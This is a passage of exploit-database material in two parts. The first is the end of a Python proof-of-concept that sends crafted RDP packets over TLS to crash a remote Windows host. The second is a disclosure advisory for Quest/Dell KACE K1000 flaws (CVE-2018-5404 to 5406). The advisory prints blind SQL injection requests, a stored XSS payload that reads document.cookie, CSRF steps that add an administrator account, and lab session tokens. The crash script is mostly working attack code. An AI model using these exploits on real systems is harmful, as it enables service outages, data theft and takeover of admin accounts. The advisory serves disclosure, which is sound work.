x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4d\x00\x6f\x00\x75\x00\x6e\x00\x74\x00\x61\x00\x69\x00\x6e\x00\x20\x00\x44\x00\x61\x00\x79\x00\x6c\x00\x69\x00\x67\x00\x68\x00\x74\x00\x20\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\xc4\xff\xff\xff\x01\x00\x00\x00\x06\x00\x00\x00\x00\x00\x64\x00\x00\x00" tls.sendall(p) def send_channel_packets(tls): p1 = b"\x03\x00\x00\x0c\x02\xf0\x80\x04\x01\x00\x01\x00" tls.sendall(p1) p2 = b"\x03\x00\x00\x08\x02\xf0\x80\x28" tls.sendall(p2) tls.recv(1024) p4 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xeb" tls.sendall(p4) tls.recv(1024) p5 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xec" tls.sendall(p5) tls.recv(1024) p6 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xed" tls.sendall(p6) tls.recv(1024) p7 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xee" tls.sendall(p7) tls.recv(1024) p8 = b"\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x07\x03\xef" tls.sendall(p8) tls.recv(1024) def send_confirm_active(tls, shareid): p = "\x03\x00\x02\x63\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x82\x54\x54\x02\x13\x00\xf0\x03\xea\x03\x01\x00\xea\x03\x06\x00\x3e\x02\x4d\x53\x54\x53\x43\x00\x17\x00\x00\x00\x01\x00\x18\x00\x01\x00\x03\x00\x00\x02\x00\x00\x00\x00\x1d\x04\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x1c\x00\x20\x00\x01\x00\x01\x00\x01\x00\x80\x07\x38\x04\x00\x00\x01\x00\x01\x00\x00\x1a\x01\x00\x00\x00\x03\x00\x58\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00\x00\x00\x01\x00\x00\x00\xaa\x00\x01\x01\x01\x01\x01\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x00\x01\x01\x01\x00\x00\x00\x00\x00\xa1\x06\x06\x00\x00\x00\x00\x00\x00\x84\x03\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x13\x00\x28\x00\x03\x00\x00\x03\x78\x00\x00\x00\x78\x00\x00\x00\xfc\x09\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x08\x00\x06\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x0c\x00\x00\x00\x00\x00\x02\x00\x02\x00\x08\x00\x0a\x00\x01\x00\x14\x00\x15\x00\x09\x00\x08\x00\x00\x00\x00\x00\x0d\x00\x58\x00\x91\x00\x20\x00\x09\x04\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x08\x00\x01\x00\x00\x00\x0e\x00\x08\x00\x01\x00\x00\x00\x10\x00\x34\x00\xfe\x00\x04\x00\xfe\x00\x04\x00\xfe\x00\x08\x00\xfe\x00\x08\x00\xfe\x00\x10\x00\xfe\x00\x20\x00\xfe\x00\x40\x00\xfe\x00\x80\x00\xfe\x00\x00\x01\x40\x00\x00\x08\x00\x01\x00\x01\x03\x00\x00\x00\x0f\x00\x08\x00\x01\x00\x00\x00\x11\x00\x0c\x00\x01\x00\x00\x00\x00\x28\x64\x00\x14\x00\x0c\x00\x01\x00\x00\x00\x00\x00\x00\x00\x15\x00\x0c\x00\x02\x00\x00\x00\x00\x0a\x00\x01\x1a\x00\x08\x00\xaf\x94\x00\x00\x1c\x00\x0c\x00\x12\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x06\x00\x01\x00\x1e\x00\x08\x00\x01\x00\x00\x00\x18\x00\x0b\x00\x02\x00\x00\x00\x03\x0c\x00\x1d\x00\x5f\x00\x02\xb9\x1b\x8d\xca\x0f\x00\x4f\x15\x58\x9f\xae\x2d\x1a\x87\xe2\xd6\x01\x03\x00\x01\x01\x03\xd4\xcc\x44\x27\x8a\x9d\x74\x4e\x80\x3c\x0e\xcb\xee\xa1\x9c\x54\x05\x31\x00\x31\x00\x00\x00\x01\x00\x00\x00\x25\x00\x00\x00\xc0\xcb\x08\x00\x00\x00\x01\x00\xc1\xcb\x1d\x00\x00\x00\x01\xc0\xcf\x02\x00\x08\x00\x00\x01\x40\x00\x02\x01\x01\x01\x00\x01\x40\x00\x02\x01\x01\x04" ba = bytearray() ba.extend(map(ord, p)) tls.sendall(bytes(ba)) def send_establish_session(tls): p = b"\x03\x00\x00\x24\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x16\x16\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x08\x00\x1f\x00\x00\x00\x01\x00\xea\x03" tls.sendall(p) p = b"\x03\x00\x00\x28\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x1a\x1a\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x0c\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00" tls.sendall(p) p = b"\x03\x00\x00\x28\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x1a\x1a\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x0c\x00\x14\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" tls.sendall(p) p = b"\x03\x00\x05\x81\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x85\x72\x72\x05\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00\xa9\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa9\x00\x00\x00\x00\x00\x02\x00\x00\x00\xa3\xce\x20\x35\xdb\x94\xa5\xe6\x0d\xa3\x8c\xfb\x64\xb7\x63\xca\xe7\x9a\x84\xc1\x0d\x67\xb7\x91\x76\x71\x21\xf9\x67\x96\xc0\xa2\x77\x5a\xd8\xb2\x74\x4f\x30\x35\x2b\xe7\xb0\xd2\xfd\x81\x90\x1a\x8f\xd5\x5e\xee\x5a\x6d\xcb\xea\x2f\xa5\x2b\x06\xe9\x0b\x0b\xa6\xad\x01\x2f\x7a\x0b\x7c\xff\x89\xd3\xa3\xe1\xf8\x00\x96\xa6\x8d\x9a\x42\xfc\xab\x14\x05\x8f\x16\xde\xc8\x05\xba\xa0\xa8\xed\x30\xd8\x67\x82\xd7\x9f\x84\xc3\x38\x27\xda\x61\xe3\xa8\xc3\x65\xe6\xec\x0c\xf6\x36\x24\xb2\x0b\xa6\x17\x1f\x46\x30\x16\xc7\x73\x60\x14\xb5\xf1\x3a\x3c\x95\x7d\x7d\x2f\x74\x7e\x56\xff\x9c\xe0\x01\x32\x9d\xf2\xd9\x35\x5e\x95\x78\x2f\xd5\x15\x6c\x18\x34\x0f\x43\xd7\x2b\x97\xa9\xb4\x28\xf4\x73\x6c\x16\xdb\x43\xd7\xe5\x58\x0c\x5a\x03\xe3\x73\x58\xd7\xd9\x76\xc2\xfe\x0b\xd7\xf4\x12\x43\x1b\x70\x6d\x74\xc2\x3d\xf1\x26\x60\x58\x80\x31\x07\x0e\x85\xa3\x95\xf8\x93\x76\x99\x9f\xec\xa0\xd4\x95\x5b\x05\xfa\x4f\xdf\x77\x8a\x7c\x29\x9f\x0b\x4f\xa1\xcb\xfa\x95\x66\xba\x47\xe3\xb0\x44\xdf\x83\x03\x44\x24\xf4\x1e\xf2\xe5\xcb\xa9\x53\x04\xc2\x76\xcb\x4d\xc6\xc2\xd4\x3f\xd3\x8c\xb3\x7c\xf3\xaa\xf3\x93\xfe\x25\xbd\x32\x7d\x48\x6e\x93\x96\x68\xe5\x18\x2b\xea\x84\x25\x69\x02\xa5\x38\x65\x6f\x0f\x9f\xf6\xa1\x3a\x1d\x22\x9d\x3f\x6d\xe0\x4c\xee\x8b\x24\xf0\xdc\xff\x70\x52\xa7\x0d\xf9\x52\x8a\x1e\x33\x1a\x30\x11\x15\xd7\xf8\x95\xa9\xbb\x74\x25\x8c\xe3\xe9\x93\x07\x43\xf5\x50\x60\xf7\x96\x2e\xd3\xff\x63\xe0\xe3\x24\xf1\x10\x3d\x8e\x0f\x56\xbc\x2e\xb8\x90\x0c\xfa\x4b\x96\x68\xfe\x59\x68\x21\xd0\xff\x52\xfe\x5c\x7d\x90\xd4\x39\xbe\x47\x9d\x8e\x7a\xaf\x95\x4f\x10\xea\x7b\x7a\xd3\xca\x07\x28\x3e\x4e\x4b\x81\x0e\xf1\x5f\x1f\x8d\xbe\x06\x40\x27\x2f\x4a\x03\x80\x32\x67\x54\x2f\x93\xfd\x25\x5d\x6d\xa0\xad\x23\x45\x72\xff\xd1\xeb\x5b\x51\x75\xa7\x61\xe0\x3f\xe4\xef\xf4\x96\xcd\xa5\x13\x8a\xe6\x52\x74\x70\xbf\xc1\xf9\xfb\x68\x9e\xdd\x72\x8f\xb4\x44\x5f\x3a\xcb\x75\x2a\x20\xa6\x69\xd2\x76\xf9\x57\x46\x2b\x5b\xda\xba\x0f\x9b\xe0\x60\xe1\x8b\x90\x33\x41\x0a\x2d\xc5\x06\xfe\xd0\xf0\xfc\xde\x35\xd4\x1e\xaa\x76\x0b\xae\xf4\xd5\xbd\xfa\xf3\x55\xf5\xc1\x67\x65\x75\x1c\x1d\x5e\xe8\x3a\xfe\x54\x50\x23\x04\xae\x2e\x71\xc2\x76\x97\xe6\x39\xc6\xb2\x25\x87\x92\x63\x52\x61\xd1\x6c\x07\xc1\x1c\x00\x30\x0d\xa7\x2f\x55\xa3\x4f\x23\xb2\x39\xc7\x04\x6c\x97\x15\x7a\xd7\x24\x33\x91\x28\x06\xa6\xe7\xc3\x79\x5c\xae\x7f\x50\x54\xc2\x38\x1e\x90\x23\x1d\xd0\xff\x5a\x56\xd6\x12\x91\xd2\x96\xde\xcc\x62\xc8\xee\x9a\x44\x07\xc1\xec\xf7\xb6\xd9\x9c\xfe\x30\x1c\xdd\xb3\x3b\x93\x65\x3c\xb4\x80\xfb\xe3\x87\xf0\xee\x42\xd8\xcf\x08\x98\x4d\xe7\x6b\x99\x0a\x43\xed\x13\x72\x90\xa9\x67\xfd\x3c\x63\x36\xec\x55\xfa\xf6\x1f\x35\xe7\x28\xf3\x87\xa6\xce\x2e\x34\xaa\x0d\xb2\xfe\x17\x18\xa2\x0c\x4e\x5f\xf0\xd1\x98\x62\x4a\x2e\x0e\xb0\x8d\xb1\x7f\x32\x52\x8e\x87\xc9\x68\x7c\x0c\xef\xee\x88\xae\x74\x2a\x33\xff\x4b\x4d\xc5\xe5\x18\x38\x74\xc7\x28\x83\xf7\x72\x87\xfc\x79\xfb\x3e\xce\xd0\x51\x13\x2d\x7c\xb4\x58\xa2\xe6\x28\x67\x4f\xec\xa6\x81\x6c\xf7\x9a\x29\xa6\x3b\xca\xec\xb8\xa1\x27\x50\xb7\xef\xfc\x81\xbf\x5d\x86\x20\x94\xc0\x1a\x0c\x41\x50\xa9\x5e\x10\x4a\x82\xf1\x74\x1f\x78\x21\xf5\x70\x61\x24\x00\x3d\x47\x5f\xf3\x25\x80\x3c\x4b\xea\xa3\xf4\x77\xea\xa1\x42\x1a\x17\x0f\x6d\xa8\x35\x9e\x91\x26\x34\x43\x04\xc6\xc6\x5b\x21\x7d\x8c\xc7\x22\x91\x7b\x2c\x2d\x2f\xd6\x7e\xa5\x52\xa8\x08\x80\xeb\x60\xd1\x44\x09\x8e\x3c\xa1\xaa\x67\x60\x0a\x26\xc6\xb5\xc6\x79\xa6\x4f\x8b\x8c\x25\x5c\xf1\x0b\x23\xf4\xd8\xa6\x6d\xf1\x91\x78\xf9\xe5\x2a\x50\x2f\x5a\x44\x22\xd9\x19\x5c\xaf\xd6\xac\x97\xa2\xf8\x0d\x0c\xe3\xdd\x88\x48\x98\x28\x0b\x8b\xbd\x76\xdc\xde\xca\xe2\xc2\x4a\x87\x50\xd4\x8c\x77\x5a\xd8\xb2\x74\x4f\x30\x35\xbf\x28\xae\xd9\xa2\x98\xa5\xbc\x60\xca\xb8\x90\x4d\x20\x46\xd9\x8a\x1a\x30\x01\x8b\x38\x63\x1a\x57\x09\x51\x46\x95\x9b\xd8\x80\x0c\xb0\x77\x24\xbf\x2b\xd3\x57\x22\xd9\x19\x5c\xaf\xd6\xac\x97\xa2\xf8\x0d\x0c\xe3\xdd\x88\x48\x98\x28\x0b\x8b\xbd\x76\xdc\xde\xca\xe2\xc2\x4a\x87\x50\xd4\x8c\x56\x92\x38\xed\x6b\x9b\x5b\x1f\xba\x53\xa1\x0e\xf7\x75\x10\x53\x22\x4c\x0a\x75\x88\x54\x69\x3f\x3b\xf3\x18\x67\x6b\x0f\x19\xd1\x00\x25\x86\xcd\xa8\xd9\xdd\x1d\x8d\x26\x87\x54\xd9\x79\xc0\x74\x65\x90\xd7\x33\x32\xaf\xba\x9d\x5a\xd5\x6c\x7c\xa1\x47\xe1\x49\x6e\x1c\xce\x9f\x62\xaa\x26\x16\x3f\x3c\xec\x5b\x49\xe5\xc0\x60\xd4\xbe\xa7\x88\xbc\xa1\x9f\x29\x71\x8c\xeb\x69\xf8\x73\xfb\xaf\x29\xaa\x40\x1b\xe5\x92\xd2\x77\xa7\x2b\xfb\xb6\x77\xb7\x31\xfb\xdc\x1e\x63\x63\x7d\xf2\xfe\x3c\x6a\xba\x0b\x20\xcb\x9d\x64\xb8\x31\x14\xe2\x70\x07\x2c\xdf\x9c\x6f\xb5\x3a\xc4\xd5\xb5\xc9\x3e\x9a\xd7\xd5\x30\xdc\x0e\x19\x89\xc6\x08\x88\xe1\xca\x81\xa6\x28\xdd\x9c\x74\x05\x11\xe7\xe1\xcc\xbc\xc7\x76\xdd\x55\xe2\xcc\xc2\xcb\xd3\xb6\x48\x01\xdd\xff\xba\xca\x31\xab\x26\x44\x1c\xdc\x06\x01\xdf\xf2\x90\x50\xb8\x6b\x8f\xe8\x29\xf0\xba\xec\xfb\x2d\xfd\x7a\xfc\x7f\x57\xbd\xea\x90\xf7\xcf\x92\x1e\xc4\x20\xd0\xb6\x9f\xd6\xdc\xa1\x82\xa9\x6c\x5e\x3e\x83\x41\x57\x73\xe9\xe7\x5a\x3f\xda\x24\x4f\x73\x5e\xf4\xe0\x92\x24\xbd\x0b\xd0\x3c\x49\x96\xb5\xb5\x05\x32\xcb\x58\x1d\x6f\x97\x51\xee\x0c\xdc\x0b\x2a\x60\xef\x97\x3e\x5a\x30\x81\x15\x91\xcf\x11\x07\x25\x2c\x41\xdb\x70\x72\xe1\x75\xf6\xa5\xff\xe8\x44\xe7\x03\xe3\x61\xaa\xdb\xe0\x07\x3d\x07\x0b\xe3\x5c\x09\xa9\x5e\x10\xfd\xcf\x74\x9e\x23\xf1\x30\x86\x16\xef\x25\x4e\xfe\xa4\x93\xa5\x80\x0a\x01\x39\xcc\x11\x7a\x6e\x94\x22\x5b\xd8\xc6\xc9\xa8\xdf\x13\x96\xb3\x91\x33\x6e\x87\xbb\x94\x63\x2d\x88\x64\xa7\x58\x89\xda\xdc\x7f\x2a\xe3\xa1\x66\xe5\xc8\x7f\xc2\xdb\xc7\x7d\x2f\xa9\x46\x28\x45\x69\xbc\xac\x9f\x85\x9e\xb0\x9f\x9a\x49\xb4\xb1\xcb" tls.sendall(p) p = b"\x03\x00\x00\x28\x02\xf0\x80\x64\x00\x07\x03\xeb\x70\x1a\x1a\x00\x17\x00\xf0\x03\xea\x03\x01\x00\x00\x01\x00\x00\x27\x00\x00\x00\x00\x00\x00\x00\x03\x00\x32\x00" tls.sendall(p) def send_kill_packet(tls, arch): if arch == "32": p = b"\x03\x00\x00\x2e\x02\xf0\x80\x64\x00\x07\x03\xef\x70\x14\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" elif arch == "64": p = b"\x03\x00\x00\x2e\x02\xf0\x80\x64\x00\x07\x03\xef\x70\x14\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" else: print("Make the second arguement '32' or '64' without quotes") sys.exit() tls.sendall(p) def terminate_connection(tls): p = b"\x03\x00\x00\x09\x02\xf0\x80\x21\x80" tls.sendall(p) def main(args): tls = send_init_packets(args[1]) send_client_data(tls) print("[+] ClientData Packet Sent") send_channel_packets(tls) print("[+] ChannelJoin/ErectDomain/AttachUser Sent") send_client_info(tls) print("[+] ClientInfo Packet Sent") tls.recv(8192) tls.recv(8192) send_confirm_active(tls, None) print("[+] ConfirmActive Packet Sent") send_establish_session(tls) print("[+] Session Established") send_kill_packet(tls, args[2]) terminate_connection(tls) print("[+] Vuln Should Trigger") if __name__ == '__main__': if len(sys.argv) != 3: print("Usage: python poc.py 127.0.0.1 64") sys.exit() elif sys.argv[2] == '32' or '64': # I've had to send the packets 5 times for hosts that havent # had a terminal session since their last reboot. I think # I know why but atm its just easier to send the exchange # 5 times and it'll crash eventually. Most of the time its # the first time though. for _ in range(5): main(sys.argv) else: print("Usage: python poc.py 127.0.0.1 64") sys.exit()

# Exploit Title: [Dell Kace Appliance Multiple Vulnerabilities] # Date: [12/04/2018] # Exploit Author: [SlidingWindow], Twitter: @kapil_khot # Vendor Homepage: [https://www.quest.com/products/kace-systems-management-appliance/] # Affected Versions: [KACE SMA versions prior to 9.0.270 PATCH SEC2018_20180410] # Tested on: [Quest Kace K1000 Appliance versions, 8.0.318, 8.0.320 and 9.0.270 ] # CVE : [CVE-2018-5404,CVE-2018-5405,CVE-2018-5406] #CERT Advisory: [https://www.kb.cert.org/vuls/id/877837/] #Vendor Advisory: https://support.quest.com/kb/288310/cert-coordination-center-report-update ================== #Product:- ================== Quest KACE, formerly Dell KACE, is a company that specializes in computer appliances for systems management of information technology equipment. It also provides software for security, application virtualization, and systems management products. ================== #Vulnerability:- ================== The Dell Kace K1000 Appliance (Now, Quest Kace K1000) suffers from several vulnerabilities such as Multiple Blind SQL Injection, Stored Cross-Site-Scripting, and mis-configured CORS. ======================== #Vulnerability Details:- ======================== ===================================================================================================================================================== 1. Blind SQL Injection Vulnerability in Ajax_Lookup_List.PHP (CVE-2018-5404) ===================================================================================================================================================== The Dell Kace allows Admin users to access ajax_lookup_list.php. However, it can be accessed by a least privileged user with ‘User Console Only’ rights. Also, the user input supplied to 'selvalue' parameter is not sanitized that leads to a Blind SQL Injection vulnerability. #Proof-Of-Concept: ------------------ 1. Send following request to the target: GET /common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13&queue_id=1&limit=10&org_id=1&locale=en_US&id=13 HTTP/1.1 Host: 192.168.247.100 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://192.168.247.100/userui/ticket.php?QUEUE_ID=1 Cookie: kbox_nav=1; KACE_LAST_USER=%98%B59%CB%D9%27f+%28%B6%83b%0F8a%EF; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i0b4qhnv66qg41893hb1q5g146; KACE_CSRF_TOKEN=4862fbb6808731e6658aeca4ea48bd2cac08502ca289e1d3305875b165fb2c86d5441145152ada3f3c701cf2387db6086e7c349c5265ec3b2110978a70ebde6f; KONEA=ebWI%2BP%2FFEgmTioFCZ3xVTgsN174jAtY0mkDdAov5uZtJEpn2FziBYMEinZsmN63zlNfEooUtIXJDgiJgmSKfFk3VvQguPiEAYQIaYpMhcFRQkfyANLWQy2tJzS8mByjYxJZlBRcYhJYlVqAMppyuikdVPOQRynpbiRNSIqVlX0wyxIBFaoF4b8O09p4wYkritpr1qM%2BMoLmA2n3%2BQCY2u%2FvD8DdrIVtm8t2%2BNxMVCCZjfpqpjKef73l7xx2yBxlV9kRG04gPNHXFfv8f4TZB82%2FvurTFqgOWThxp51YjdpWfssEJQsss1O1B3FtYEH0h83Wrl9ABzsRx%2FZafVGjQTw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjozLCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6IjRkMzkwY2M2ODMzZTRkMjk4MTI0NzYyYmQwYjdiNzRjIiwiZXhwIjoxNTIxMzA3NTExfQ.S9h0USN7xS0VmeapB6zWqKnAW-e-vd9J9-NrH9383gSXX6K_vEgXSv0FpuPGCtYQ2I3o7gxuYBKxy_qCqp1xd2w2NRowiZb5_WlwoHBWeTnaP3D9Y6Ek4nd9CKgPaZF1Y8TtaZkdbbWWFTdjtpkD3CK5eNHX_lsqtPD_gVJWwxc Connection: close 2. Make a note of Content-Length in the response body. 3. Send following request: http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13'&queue_id=1&limit=10&org_id=1&locale=en_US&id=13 4. Response to above request shows that an error occurred and we are being redirected to /common/error.php 5. Final payload to check if we get the original response back: http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13''&queue_id=1&limit=10&org_id=1&locale=en_US&id=13 6. These tests confirm that the 'selvalue' parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database. ========================================================================================================================================================= 2. Blind SQL Injection Vulnerability in Oval_Detail.PHP (CVE-2018-5404) ========================================================================================================================================================= The Dell Kace allows Admin users to view OVAL templates via 'oval_detail.php', that can be accessed by a user with ‘Read Only Administrator’ rights. Also, the user input supplied to ID parameter is not sanitized that leads to a Blind SQL Injection vulnerability. An authenticated user with ‘Read Only Administrator’ rights could exploit this vulnerability to retrieve sensitive information from the database. #Proof-Of-Concept: ------------------ 1. Send following request to the target: GET /adminui/oval_detail.php?ID=6200 HTTP/1.1 Host: 192.168.247.100 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.247.100/adminui/oval_list.php Cookie: kbox_nav=1; KACE_LAST_USER=%9A%95%91%5E%AF%B2%A6%FA%02M%B5%7D%08%87%D52; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i48m8gm8kcnbiptc28pq8u7uq1; KACE_CSRF_TOKEN=96acbdac36b0143958a7d96ba318eb5c626884d46733a8ed05c88cfe94d80cfdebe6bd9790ff4fec3a79fa988ff828dac4d841356c72eebb015d20c5ffd5a01a; KONEA=xvqV3k6fWuhsnypD45pPw4OPs7fZxUDP24mubodoYiSj8Y8EqJpUnakrq%2BHEefSs0YkzglNboWvUhE%2FuavTZZrkyNPMF1IH2QB%2FIF7jSm6fLukuuMyLgTFZWtOg16t5eJqCXvn0f54tfwFnfB1tobY%2Fu6MDe8BOWKaj6mByvdD6kNREg%2B%2FLwAcfIYmgJNKYu0Wd9JwsRpWpuRyZkejbrZB%2FSlkh80oHvHSey0inQmIy7B4bYnPCPUfTU8qPeZLaPcvYFchruj%2BabBazlHAaq44txeUy2AtG85ntiN8XPXoZnflHOD%2B5WjTywTtRGiRpCQVQNDbHTOdSUuljpDEyjrw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjo0LCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6ImVlMTk3ZGE5NmFmYTRiYzViYzk5Y2VhMzI3ZjQ2OTdiIiwiZXhwIjoxNTIxMjk3MzE5fQ.GHuAWu_mcviKl0HQcFjY0In5aJxgB-WZCaHP5XQMdpdboby0b1qnwh4DyC3TQg4PktBm_D0Vu4LOMY5KWGRvwOQCTwrzBFLg3ogsKWb0AMO3RArrENXxEO3P3K6XFQCEIlpU9n9K1APnnRSTsfPEL7GC5GkzixakXAlZMZzLB_0 Connection: close Upgrade-Insecure-Requests: 1 2. Response to above request shows some content with the content length of 32109 bytes: 3. It shows information about OVAL-ID#24253: 4. Now send following payload that tests this ID parameter for a true condition: http://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6432 5. Response to above request again shows information about the same OVAL-ID#24252: 6. Now, use following payload to test this ID parameter for a false condition: http://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6444 7. The response to false condition is different than the response to normal and/or true condition. This response does not show any information about any OVAL-ID: 8. These tests confirm that the ID parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database. ========================================================================================================================================================= 3. Stored Cross Site Scripting (XSS) Vulnerability (CVE-2018-5405) ========================================================================================================================================================= The Dell Kace K1000 fails to sanitize user input when creating a ticket. A least privileged user with ‘User Console Only’ rights could exploit this vulnerability to inject arbitrary JavaScript while creating tickets that would be executed when administrators or any other user view these tickets. An authenticated least privileged user with ‘User Console Only’ rights to inject arbitrary JavaScript code on the tickets page. This script executes every time a user visits this page. This allows a malicious user of the system to steal session cookies of other users including Administrator and take over their session. This can further be exploited to launch other attacks. #Proof-Of-Concept: ------------------ 1. Log into the Dell Kace K1000 web interface as a least privileged user. 2. Navigate to Service Desk-->Tickets and create a new ticket. 3. Inject following payload in the Summary section: Test Ticket</textarea></div></div><script>alert("XSSinSummary");alert(document.cookie);</script><!-- 4. Save the ticket. 5. Go back to tickets and view this newly created ticket and a couple of alert boxes should pop up. 6. Any user, including administrator visiting this ticket page would execute the injected script. ========================================================================================================================================================= 4. Misconfigured CORS Vulnerability (CVE-2018-5406) ========================================================================================================================================================= The Dell Kace K1000 fails to implement Cross Origin Resource Sharing (CORS) properly, that leads to a Cross Site Request Forgery (CSRF) attack. An unauthenticated, remote attacker could exploit this vulnerability to perform sensitive actions such as adding a new administrator account or changing appliance’s settings. Also, malicious internal user of the organization could induce an administrator of this appliance to visit a malicious link that exploits this vulnerability to perform sensitive actions such as adding a new administrator account or changing appliance’s settings. #Proof-Of-Concept: ------------------ 1. Try to create a new user and capture the request in BurpSuite to create a CSRF PoC from there. Create an HTML form and put it under Web Root of your Kali machine. 2. Log into the web interface of the appliance as admin. 3. Open a new tab in the same browser and access the HTML page from #1 4. Save the ticket. 5. Submit the request (This can be modified to submit the request automatically). 6. Check BurpSuite to see if the request to add user ‘Hacker’ was sent to the appliance and if it was originated from your Kali machine 7. Check the admin console to see if user Hacker has been added: =================================== #Vulnerability Disclosure Timeline: =================================== 04/2018: Submitted report to CERT-US. 04/2018: CERT-US reported the issue to vendor. 05/2018: Awaiting vendor response. 10/2018: Vendor asked to test the patch as they have fixed these issues already. 10/2018: Confirmed that all the vulnerabilities except Vulnerability#2 is fixed in 9.0.270 and still exists in other patched version. 01/2019: Vendor confirmed that they are working on fixing all of the vulnerabilities and would release a patch on May 01 2019 and asked to publish this on June 01 2019 so that customers have enough time to patch. 05/2019: Vendor published an advisory. 06/2019: CERT-US published a Vulnerability Note, VU#877837.

